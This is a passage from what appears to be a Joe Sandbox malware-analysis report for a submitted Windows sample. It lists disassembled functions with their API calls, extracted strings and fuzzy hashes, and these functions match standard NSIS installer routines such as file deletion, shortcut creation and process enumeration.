Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

Non-executed Functions

Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 004049BF
GetDlgItem.USER32(?,00000408), ref: 004049CC
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
LoadBitmapW.USER32(0000006E), ref: 00404A2E
SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
DeleteObject.GDI32(?), ref: 00404AA5
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
ShowWindow.USER32(?,00000005), ref: 00404BFB
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
ImageList_Destroy.COMCTL32(?), ref: 00404DC8
GlobalFree.KERNEL32(?), ref: 00404DD8
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
ShowWindow.USER32(?,00000000), ref: 00404F75
GetDlgItem.USER32(?,000003FE), ref: 00404F80
ShowWindow.USER32(00000000), ref: 00404F87

Strings

, xrefs: 00404F65
M, xrefs: 00404B6F
@, xrefs: 00404BBC
N, xrefs: 00404C32

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58

Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
lstrlenW.KERNEL32(?), ref: 00406D58
FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
FindClose.KERNEL32(?), ref: 00406E5F

Strings

Delete: DeleteFile failed("%s"), xrefs: 00406E29
Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
\*.*, xrefs: 00406D2F
ptF, xrefs: 00406D1A
RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
Delete: DeleteFile("%s"), xrefs: 00406DE8

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
API String ID: 2035342205-1650287579
Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE

Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 00404525
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
GetDlgItem.USER32(?,000003FB), ref: 00404553
GetAsyncKeyState.USER32(00000010), ref: 0040455A
GetDlgItem.USER32(?,000003F0), ref: 0040456F
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
SetWindowTextW.USER32(?,?), ref: 004045AF
SHBrowseForFolderW.SHELL32(?), ref: 00404669
lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
CoTaskMemFree.OLE32(00000000), ref: 00404674

Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB

GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424CAD,76F923A0,00000000), ref: 00406902

SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819

Strings

A, xrefs: 00404662
F, xrefs: 004046A0

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: F$A
API String ID: 3347642858-1281894373
Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59

Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
lstrcmpA.KERNEL32(name,?), ref: 00406FF3
CloseHandle.KERNEL32(?), ref: 00407212

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

GetTTFNameString, xrefs: 00406F33
%s: failed opening file "%s", xrefs: 00406F38
name, xrefs: 00406FEB

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75

Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424CAD,76F923A0,00000000), ref: 00406902
GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00424CAD,76F923A0,00000000), ref: 00406A73

Strings

F, xrefs: 00406A7F
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406952
F, xrefs: 00406858
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406A0B

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-1792361021
Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54

Function 004079A2 Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95

Function 0040737E Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85

Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
lstrlenW.KERNEL32(?), ref: 004063F8
GetVersionExW.KERNEL32(?), ref: 00406456

Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
FreeLibrary.KERNEL32(00000000), ref: 00406500
GlobalFree.KERNEL32(?), ref: 00406509

Strings

EnumProcessModules, xrefs: 004064B6
EnumProcesses, xrefs: 004064AE
CreateToolhelp32Snapshot, xrefs: 004065E1
Kernel32.DLL, xrefs: 004065C7
GetModuleBaseNameW, xrefs: 004064C0
Module32NextW, xrefs: 0040660A
Module32FirstW, xrefs: 004065FF
Process32FirstW, xrefs: 004065E9
Process32NextW, xrefs: 004065F4
PSAPI.DLL, xrefs: 00406490
Unknown, xrefs: 00406528

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59

Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
GetDlgItem.USER32(?,000003E8), ref: 004041AD
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
GetSysColor.USER32(?), ref: 004041DB
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
lstrlenW.KERNEL32(?), ref: 00404202
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E

Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030

GetDlgItem.USER32(?,0000040A), ref: 00404276
SendMessageW.USER32(00000000), ref: 0040427D
GetDlgItem.USER32(?,000003E8), ref: 004042AA
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
SetCursor.USER32(00000000), ref: 004042FE
ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
SetCursor.USER32(00000000), ref: 00404322
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363

Strings

N, xrefs: 00404298
F, xrefs: 004042D3
open, xrefs: 0040430B

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: F$N$open
API String ID: 3928313111-1104729357
Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99

Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD

Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
wsprintfA.USER32 ref: 00406B79
GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
